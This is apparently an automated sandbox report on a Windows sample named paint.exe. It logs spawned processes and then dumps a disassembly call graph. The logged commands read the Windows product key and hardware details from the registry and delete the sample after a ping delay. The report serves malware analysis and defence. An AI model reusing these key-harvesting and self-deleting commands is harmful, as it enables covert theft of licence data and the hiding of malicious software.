                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:100
                                                                                                                                                                                                                                                              Start time:04:16:32
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:101
                                                                                                                                                                                                                                                              Start time:04:16:32
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:102
                                                                                                                                                                                                                                                              Start time:04:16:33
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:103
                                                                                                                                                                                                                                                              Start time:04:16:33
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:104
                                                                                                                                                                                                                                                              Start time:04:16:33
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                              Imagebase:0x7ff69bf10000
                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:105
                                                                                                                                                                                                                                                              Start time:04:16:34
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:106
                                                                                                                                                                                                                                                              Start time:04:16:34
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:107
                                                                                                                                                                                                                                                              Start time:04:16:34
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:108
                                                                                                                                                                                                                                                              Start time:04:16:36
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:109
                                                                                                                                                                                                                                                              Start time:04:16:36
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:110
                                                                                                                                                                                                                                                              Start time:04:16:36
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:ping localhost -n 3
                                                                                                                                                                                                                                                              Imagebase:0x7ff69c740000
                                                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:9.4%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:19.7%
                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                Total number of Limit Nodes:37
                                                                                                                                                                                                                                                                execution_graph 20568 7ff6f0be5480 20569 7ff6f0be548b 20568->20569 20577 7ff6f0bef314 20569->20577 20590 7ff6f0bf0348 EnterCriticalSection 20577->20590 19621 7ff6f0bef9fc 19622 7ff6f0befbee 19621->19622 19624 7ff6f0befa3e _isindst 19621->19624 19623 7ff6f0be4f78 _get_daylight 11 API calls 19622->19623 19641 7ff6f0befbde 19623->19641 19624->19622 19627 7ff6f0befabe _isindst 19624->19627 19625 7ff6f0bdc5c0 _log10_special 8 API calls 19626 7ff6f0befc09 19625->19626 19642 7ff6f0bf6204 19627->19642 19632 7ff6f0befc1a 19634 7ff6f0bea970 _isindst 17 API calls 19632->19634 19636 7ff6f0befc2e 19634->19636 19639 7ff6f0befb1b 19639->19641 19666 7ff6f0bf6248 19639->19666 19641->19625 19643 7ff6f0bf6213 19642->19643 19644 7ff6f0befadc 19642->19644 19673 7ff6f0bf0348 EnterCriticalSection 19643->19673 19648 7ff6f0bf5608 19644->19648 19649 7ff6f0bf5611 19648->19649 19650 7ff6f0befaf1 19648->19650 19651 7ff6f0be4f78 _get_daylight 11 API calls 19649->19651 19650->19632 19654 7ff6f0bf5638 19650->19654 19652 7ff6f0bf5616 19651->19652 19653 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19652->19653 19653->19650 19655 7ff6f0bf5641 19654->19655 19656 7ff6f0befb02 19654->19656 19657 7ff6f0be4f78 _get_daylight 11 API calls 19655->19657 19656->19632 19660 7ff6f0bf5668 19656->19660 19658 7ff6f0bf5646 19657->19658 19659 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19658->19659 19659->19656 19661 7ff6f0bf5671 19660->19661 19662 7ff6f0befb13 19660->19662 19663 7ff6f0be4f78 _get_daylight 11 API calls 19661->19663 19662->19632 19662->19639 19664 7ff6f0bf5676 19663->19664 19665 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19664->19665 19665->19662 19674 7ff6f0bf0348 EnterCriticalSection 19666->19674 19983 7ff6f0bec590 19994 7ff6f0bf0348 EnterCriticalSection 19983->19994 20339 7ff6f0bf1720 20350 7ff6f0bf7454 20339->20350 20351 7ff6f0bf7461 20350->20351 20352 7ff6f0bea9b8 __free_lconv_num 11 API calls 20351->20352 20353 7ff6f0bf747d 20351->20353 20352->20351 20354 7ff6f0bea9b8 __free_lconv_num 11 API calls 20353->20354 20355 7ff6f0bf1729 20353->20355 20354->20353 20356 7ff6f0bf0348 EnterCriticalSection 20355->20356 19508 7ff6f0be5698 19509 7ff6f0be56b2 19508->19509 19510 7ff6f0be56cf 19508->19510 19511 7ff6f0be4f58 _fread_nolock 11 API calls 19509->19511 19510->19509 19512 7ff6f0be56e2 CreateFileW 19510->19512 19513 7ff6f0be56b7 19511->19513 19514 7ff6f0be574c 19512->19514 19515 7ff6f0be5716 19512->19515 19517 7ff6f0be4f78 _get_daylight 11 API calls 19513->19517 19559 7ff6f0be5c74 19514->19559 19533 7ff6f0be57ec GetFileType 19515->19533 19520 7ff6f0be56bf 19517->19520 19524 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19520->19524 19522 7ff6f0be5755 19528 7ff6f0be4eec _fread_nolock 11 API calls 19522->19528 19523 7ff6f0be5780 19580 7ff6f0be5a34 19523->19580 19527 7ff6f0be56ca 19524->19527 19525 7ff6f0be5741 CloseHandle 19525->19527 19526 7ff6f0be572b CloseHandle 19526->19527 19532 7ff6f0be575f 19528->19532 19532->19527 19534 7ff6f0be583a 19533->19534 19535 7ff6f0be58f7 19533->19535 19536 7ff6f0be5866 GetFileInformationByHandle 19534->19536 19540 7ff6f0be5b70 21 API calls 19534->19540 19537 7ff6f0be58ff 19535->19537 19538 7ff6f0be5921 19535->19538 19541 7ff6f0be5912 GetLastError 19536->19541 19542 7ff6f0be588f 19536->19542 19537->19541 19543 7ff6f0be5903 19537->19543 19539 7ff6f0be5944 PeekNamedPipe 19538->19539 19547 7ff6f0be58e2 19538->19547 19539->19547 19548 7ff6f0be5854 19540->19548 19546 7ff6f0be4eec _fread_nolock 11 API calls 19541->19546 19544 7ff6f0be5a34 51 API calls 19542->19544 19545 7ff6f0be4f78 _get_daylight 11 API calls 19543->19545 19549 7ff6f0be589a 19544->19549 19545->19547 19546->19547 19550 7ff6f0bdc5c0 _log10_special 8 API calls 19547->19550 19548->19536 19548->19547 19597 7ff6f0be5994 19549->19597 19552 7ff6f0be5724 19550->19552 19552->19525 19552->19526 19554 7ff6f0be5994 10 API calls 19555 7ff6f0be58b9 19554->19555 19556 7ff6f0be5994 10 API calls 19555->19556 19557 7ff6f0be58ca 19556->19557 19557->19547 19558 7ff6f0be4f78 _get_daylight 11 API calls 19557->19558 19558->19547 19560 7ff6f0be5caa 19559->19560 19561 7ff6f0be4f78 _get_daylight 11 API calls 19560->19561 19579 7ff6f0be5d42 __vcrt_freefls 19560->19579 19563 7ff6f0be5cbc 19561->19563 19562 7ff6f0bdc5c0 _log10_special 8 API calls 19564 7ff6f0be5751 19562->19564 19565 7ff6f0be4f78 _get_daylight 11 API calls 19563->19565 19564->19522 19564->19523 19566 7ff6f0be5cc4 19565->19566 19567 7ff6f0be7e78 45 API calls 19566->19567 19568 7ff6f0be5cd9 19567->19568 19569 7ff6f0be5ce1 19568->19569 19570 7ff6f0be5ceb 19568->19570 19571 7ff6f0be4f78 _get_daylight 11 API calls 19569->19571 19572 7ff6f0be4f78 _get_daylight 11 API calls 19570->19572 19575 7ff6f0be5ce6 19571->19575 19573 7ff6f0be5cf0 19572->19573 19574 7ff6f0be4f78 _get_daylight 11 API calls 19573->19574 19573->19579 19576 7ff6f0be5cfa 19574->19576 19577 7ff6f0be5d34 GetDriveTypeW 19575->19577 19575->19579 19578 7ff6f0be7e78 45 API calls 19576->19578 19577->19579 19578->19575 19579->19562 19581 7ff6f0be5a5c 19580->19581 19582 7ff6f0be578d 19581->19582 19604 7ff6f0bef794 19581->19604 19590 7ff6f0be5b70 19582->19590 19584 7ff6f0be5af0 19584->19582 19585 7ff6f0bef794 51 API calls 19584->19585 19586 7ff6f0be5b03 19585->19586 19586->19582 19587 7ff6f0bef794 51 API calls 19586->19587 19588 7ff6f0be5b16 19587->19588 19588->19582 19589 7ff6f0bef794 51 API calls 19588->19589 19589->19582 19591 7ff6f0be5b8a 19590->19591 19592 7ff6f0be5bc1 19591->19592 19593 7ff6f0be5b9a 19591->19593 19594 7ff6f0bef628 21 API calls 19592->19594 19595 7ff6f0be5baa 19593->19595 19596 7ff6f0be4eec _fread_nolock 11 API calls 19593->19596 19594->19595 19595->19532 19596->19595 19598 7ff6f0be59b0 19597->19598 19599 7ff6f0be59bd FileTimeToSystemTime 19597->19599 19598->19599 19601 7ff6f0be59b8 19598->19601 19600 7ff6f0be59d1 SystemTimeToTzSpecificLocalTime 19599->19600 19599->19601 19600->19601 19602 7ff6f0bdc5c0 _log10_special 8 API calls 19601->19602 19603 7ff6f0be58a9 19602->19603 19603->19554 19605 7ff6f0bef7a1 19604->19605 19606 7ff6f0bef7c5 19604->19606 19605->19606 19607 7ff6f0bef7a6 19605->19607 19609 7ff6f0bef7ff 19606->19609 19610 7ff6f0bef81e 19606->19610 19608 7ff6f0be4f78 _get_daylight 11 API calls 19607->19608 19611 7ff6f0bef7ab 19608->19611 19612 7ff6f0be4f78 _get_daylight 11 API calls 19609->19612 19613 7ff6f0be4fbc 45 API calls 19610->19613 19614 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19611->19614 19615 7ff6f0bef804 19612->19615 19620 7ff6f0bef82b 19613->19620 19616 7ff6f0bef7b6 19614->19616 19617 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19615->19617 19616->19584 19618 7ff6f0bef80f 19617->19618 19618->19584 19619 7ff6f0bf054c 51 API calls 19619->19620 19620->19618 19620->19619 16265 7ff6f0bdccac 16286 7ff6f0bdce7c 16265->16286 16268 7ff6f0bdcdf8 16440 7ff6f0bdd19c IsProcessorFeaturePresent 16268->16440 16269 7ff6f0bdccc8 __scrt_acquire_startup_lock 16271 7ff6f0bdce02 16269->16271 16278 7ff6f0bdcce6 __scrt_release_startup_lock 16269->16278 16272 7ff6f0bdd19c 7 API calls 16271->16272 16274 7ff6f0bdce0d __CxxCallCatchBlock 16272->16274 16273 7ff6f0bdcd0b 16275 7ff6f0bdcd91 16292 7ff6f0bdd2e4 16275->16292 16277 7ff6f0bdcd96 16295 7ff6f0bd1000 16277->16295 16278->16273 16278->16275 16429 7ff6f0be9b9c 16278->16429 16283 7ff6f0bdcdb9 16283->16274 16436 7ff6f0bdd000 16283->16436 16287 7ff6f0bdce84 16286->16287 16288 7ff6f0bdce90 __scrt_dllmain_crt_thread_attach 16287->16288 16289 7ff6f0bdccc0 16288->16289 16290 7ff6f0bdce9d 16288->16290 16289->16268 16289->16269 16290->16289 16447 7ff6f0bdd8f8 16290->16447 16474 7ff6f0bfa540 16292->16474 16296 7ff6f0bd1009 16295->16296 16476 7ff6f0be54f4 16296->16476 16298 7ff6f0bd37fb 16483 7ff6f0bd36b0 16298->16483 16301 7ff6f0bd3808 __vcrt_freefls 16304 7ff6f0bdc5c0 _log10_special 8 API calls 16301->16304 16307 7ff6f0bd3ca7 16304->16307 16305 7ff6f0bd391b 16659 7ff6f0bd45b0 16305->16659 16306 7ff6f0bd383c 16650 7ff6f0bd1c80 16306->16650 16434 7ff6f0bdd328 GetModuleHandleW 16307->16434 16310 7ff6f0bd385b 16555 7ff6f0bd8a20 16310->16555 16313 7ff6f0bd396a 16682 7ff6f0bd2710 16313->16682 16315 7ff6f0bd388e 16323 7ff6f0bd38bb __vcrt_freefls 16315->16323 16654 7ff6f0bd8b90 16315->16654 16317 7ff6f0bd395d 16318 7ff6f0bd3962 16317->16318 16319 7ff6f0bd3984 16317->16319 16678 7ff6f0be00bc 16318->16678 16321 7ff6f0bd1c80 49 API calls 16319->16321 16324 7ff6f0bd39a3 16321->16324 16325 7ff6f0bd8a20 14 API calls 16323->16325 16332 7ff6f0bd38de __vcrt_freefls 16323->16332 16329 7ff6f0bd1950 115 API calls 16324->16329 16325->16332 16326 7ff6f0bd8b30 40 API calls 16327 7ff6f0bd3a0b 16326->16327 16328 7ff6f0bd8b90 40 API calls 16327->16328 16330 7ff6f0bd3a17 16328->16330 16331 7ff6f0bd39ce 16329->16331 16333 7ff6f0bd8b90 40 API calls 16330->16333 16331->16310 16334 7ff6f0bd39de 16331->16334 16332->16326 16338 7ff6f0bd390e __vcrt_freefls 16332->16338 16335 7ff6f0bd3a23 16333->16335 16336 7ff6f0bd2710 54 API calls 16334->16336 16337 7ff6f0bd8b90 40 API calls 16335->16337 16336->16301 16337->16338 16339 7ff6f0bd8a20 14 API calls 16338->16339 16340 7ff6f0bd3a3b 16339->16340 16341 7ff6f0bd3b2f 16340->16341 16342 7ff6f0bd3a60 __vcrt_freefls 16340->16342 16343 7ff6f0bd2710 54 API calls 16341->16343 16345 7ff6f0bd3aab 16342->16345 16568 7ff6f0bd8b30 16342->16568 16343->16301 16346 7ff6f0bd8a20 14 API calls 16345->16346 16347 7ff6f0bd3bf4 __vcrt_freefls 16346->16347 16348 7ff6f0bd3d41 16347->16348 16349 7ff6f0bd3c46 16347->16349 16693 7ff6f0bd44d0 16348->16693 16350 7ff6f0bd3cd4 16349->16350 16351 7ff6f0bd3c50 16349->16351 16354 7ff6f0bd8a20 14 API calls 16350->16354 16575 7ff6f0bd90e0 16351->16575 16357 7ff6f0bd3ce0 16354->16357 16355 7ff6f0bd3d4f 16358 7ff6f0bd3d65 16355->16358 16359 7ff6f0bd3d71 16355->16359 16360 7ff6f0bd3c61 16357->16360 16363 7ff6f0bd3ced 16357->16363 16696 7ff6f0bd4620 16358->16696 16362 7ff6f0bd1c80 49 API calls 16359->16362 16365 7ff6f0bd2710 54 API calls 16360->16365 16373 7ff6f0bd3cc8 __vcrt_freefls 16362->16373 16366 7ff6f0bd1c80 49 API calls 16363->16366 16365->16301 16369 7ff6f0bd3d0b 16366->16369 16367 7ff6f0bd3dc4 16625 7ff6f0bd9400 16367->16625 16372 7ff6f0bd3d12 16369->16372 16369->16373 16371 7ff6f0bd3dd7 SetDllDirectoryW 16377 7ff6f0bd3e0a 16371->16377 16420 7ff6f0bd3e5a 16371->16420 16376 7ff6f0bd2710 54 API calls 16372->16376 16373->16367 16374 7ff6f0bd3da7 SetDllDirectoryW LoadLibraryExW 16373->16374 16374->16367 16376->16301 16378 7ff6f0bd8a20 14 API calls 16377->16378 16386 7ff6f0bd3e16 __vcrt_freefls 16378->16386 16379 7ff6f0bd3ffc 16381 7ff6f0bd4006 PostMessageW GetMessageW 16379->16381 16382 7ff6f0bd4029 16379->16382 16380 7ff6f0bd3f1b 16630 7ff6f0bd33c0 16380->16630 16381->16382 16773 7ff6f0bd3360 16382->16773 16389 7ff6f0bd3ef2 16386->16389 16393 7ff6f0bd3e4e 16386->16393 16392 7ff6f0bd8b30 40 API calls 16389->16392 16392->16420 16393->16420 16699 7ff6f0bd6db0 16393->16699 16406 7ff6f0bd3e81 16420->16379 16420->16380 16430 7ff6f0be9bd4 16429->16430 16431 7ff6f0be9bb3 16429->16431 16432 7ff6f0bea448 45 API calls 16430->16432 16431->16275 16433 7ff6f0be9bd9 16432->16433 16435 7ff6f0bdd339 16434->16435 16435->16283 16437 7ff6f0bdd011 16436->16437 16438 7ff6f0bdcdd0 16437->16438 16439 7ff6f0bdd8f8 7 API calls 16437->16439 16438->16273 16439->16438 16441 7ff6f0bdd1c2 _isindst __scrt_get_show_window_mode 16440->16441 16442 7ff6f0bdd1e1 RtlCaptureContext RtlLookupFunctionEntry 16441->16442 16443 7ff6f0bdd20a RtlVirtualUnwind 16442->16443 16444 7ff6f0bdd246 __scrt_get_show_window_mode 16442->16444 16443->16444 16445 7ff6f0bdd278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16444->16445 16446 7ff6f0bdd2c6 _isindst 16445->16446 16446->16271 16448 7ff6f0bdd900 16447->16448 16449 7ff6f0bdd90a 16447->16449 16453 7ff6f0bddc94 16448->16453 16449->16289 16454 7ff6f0bddca3 16453->16454 16455 7ff6f0bdd905 16453->16455 16461 7ff6f0bdded0 16454->16461 16457 7ff6f0bddd00 16455->16457 16458 7ff6f0bddd2b 16457->16458 16459 7ff6f0bddd2f 16458->16459 16460 7ff6f0bddd0e DeleteCriticalSection 16458->16460 16459->16449 16460->16458 16465 7ff6f0bddd38 16461->16465 16466 7ff6f0bdde22 TlsFree 16465->16466 16472 7ff6f0bddd7c __vcrt_InitializeCriticalSectionEx 16465->16472 16467 7ff6f0bdddaa LoadLibraryExW 16469 7ff6f0bdddcb GetLastError 16467->16469 16470 7ff6f0bdde49 16467->16470 16468 7ff6f0bdde69 GetProcAddress 16468->16466 16469->16472 16470->16468 16471 7ff6f0bdde60 FreeLibrary 16470->16471 16471->16468 16472->16466 16472->16467 16472->16468 16473 7ff6f0bddded LoadLibraryExW 16472->16473 16473->16470 16473->16472 16475 7ff6f0bdd2fb GetStartupInfoW 16474->16475 16475->16277 16478 7ff6f0bef4f0 16476->16478 16477 7ff6f0bef543 16479 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 16477->16479 16478->16477 16480 7ff6f0bef596 16478->16480 16482 7ff6f0bef56c 16479->16482 16786 7ff6f0bef3c8 16480->16786 16482->16298 16794 7ff6f0bdc8c0 16483->16794 16486 7ff6f0bd3710 16796 7ff6f0bd92f0 FindFirstFileExW 16486->16796 16487 7ff6f0bd36eb GetLastError 16801 7ff6f0bd2c50 16487->16801 16491 7ff6f0bd3723 16816 7ff6f0bd9370 CreateFileW 16491->16816 16492 7ff6f0bd377d 16827 7ff6f0bd94b0 16492->16827 16494 7ff6f0bdc5c0 _log10_special 8 API calls 16497 7ff6f0bd37b5 16494->16497 16496 7ff6f0bd378b 16499 7ff6f0bd3706 16496->16499 16502 7ff6f0bd2810 49 API calls 16496->16502 16497->16301 16505 7ff6f0bd1950 16497->16505 16499->16494 16500 7ff6f0bd3734 16819 7ff6f0bd2810 16500->16819 16501 7ff6f0bd374c __vcrt_InitializeCriticalSectionEx 16501->16492 16502->16499 16506 7ff6f0bd45b0 108 API calls 16505->16506 16507 7ff6f0bd1985 16506->16507 16508 7ff6f0bd1c43 16507->16508 16509 7ff6f0bd7f80 83 API calls 16507->16509 16510 7ff6f0bdc5c0 _log10_special 8 API calls 16508->16510 16512 7ff6f0bd19cb 16509->16512 16511 7ff6f0bd1c5e 16510->16511 16511->16305 16511->16306 16554 7ff6f0bd1a03 16512->16554 17200 7ff6f0be0744 16512->17200 16514 7ff6f0be00bc 74 API calls 16514->16508 16515 7ff6f0bd19e5 16516 7ff6f0bd1a08 16515->16516 16517 7ff6f0bd19e9 16515->16517 17204 7ff6f0be040c 16516->17204 16519 7ff6f0be4f78 _get_daylight 11 API calls 16517->16519 16521 7ff6f0bd19ee 16519->16521 17207 7ff6f0bd2910 16521->17207 16522 7ff6f0bd1a45 16528 7ff6f0bd1a7b 16522->16528 16529 7ff6f0bd1a5c 16522->16529 16523 7ff6f0bd1a26 16525 7ff6f0be4f78 _get_daylight 11 API calls 16523->16525 16526 7ff6f0bd1a2b 16525->16526 16527 7ff6f0bd2910 54 API calls 16526->16527 16527->16554 16530 7ff6f0bd1c80 49 API calls 16528->16530 16531 7ff6f0be4f78 _get_daylight 11 API calls 16529->16531 16532 7ff6f0bd1a92 16530->16532 16533 7ff6f0bd1a61 16531->16533 16534 7ff6f0bd1c80 49 API calls 16532->16534 16535 7ff6f0bd2910 54 API calls 16533->16535 16536 7ff6f0bd1add 16534->16536 16535->16554 16537 7ff6f0be0744 73 API calls 16536->16537 16538 7ff6f0bd1b01 16537->16538 16539 7ff6f0bd1b35 16538->16539 16540 7ff6f0bd1b16 16538->16540 16541 7ff6f0be040c _fread_nolock 53 API calls 16539->16541 16542 7ff6f0be4f78 _get_daylight 11 API calls 16540->16542 16543 7ff6f0bd1b4a 16541->16543 16544 7ff6f0bd1b1b 16542->16544 16545 7ff6f0bd1b6f 16543->16545 16546 7ff6f0bd1b50 16543->16546 16547 7ff6f0bd2910 54 API calls 16544->16547 17222 7ff6f0be0180 16545->17222 16548 7ff6f0be4f78 _get_daylight 11 API calls 16546->16548 16547->16554 16550 7ff6f0bd1b55 16548->16550 16552 7ff6f0bd2910 54 API calls 16550->16552 16552->16554 16553 7ff6f0bd2710 54 API calls 16553->16554 16554->16514 16556 7ff6f0bd8a2a 16555->16556 16557 7ff6f0bd9400 2 API calls 16556->16557 16558 7ff6f0bd8a49 GetEnvironmentVariableW 16557->16558 16559 7ff6f0bd8ab2 16558->16559 16560 7ff6f0bd8a66 ExpandEnvironmentStringsW 16558->16560 16562 7ff6f0bdc5c0 _log10_special 8 API calls 16559->16562 16560->16559 16561 7ff6f0bd8a88 16560->16561 16563 7ff6f0bd94b0 2 API calls 16561->16563 16564 7ff6f0bd8ac4 16562->16564 16565 7ff6f0bd8a9a 16563->16565 16564->16315 16566 7ff6f0bdc5c0 _log10_special 8 API calls 16565->16566 16567 7ff6f0bd8aaa 16566->16567 16567->16315 16569 7ff6f0bd9400 2 API calls 16568->16569 16570 7ff6f0bd8b4c 16569->16570 16571 7ff6f0bd9400 2 API calls 16570->16571 16572 7ff6f0bd8b5c 16571->16572 17440 7ff6f0be82a8 16572->17440 16574 7ff6f0bd8b6a __vcrt_freefls 16574->16345 16576 7ff6f0bd90f5 16575->16576 17458 7ff6f0bd8760 GetCurrentProcess OpenProcessToken 16576->17458 16579 7ff6f0bd8760 7 API calls 16580 7ff6f0bd9121 16579->16580 16581 7ff6f0bd9154 16580->16581 16582 7ff6f0bd913a 16580->16582 16583 7ff6f0bd26b0 48 API calls 16581->16583 16584 7ff6f0bd26b0 48 API calls 16582->16584 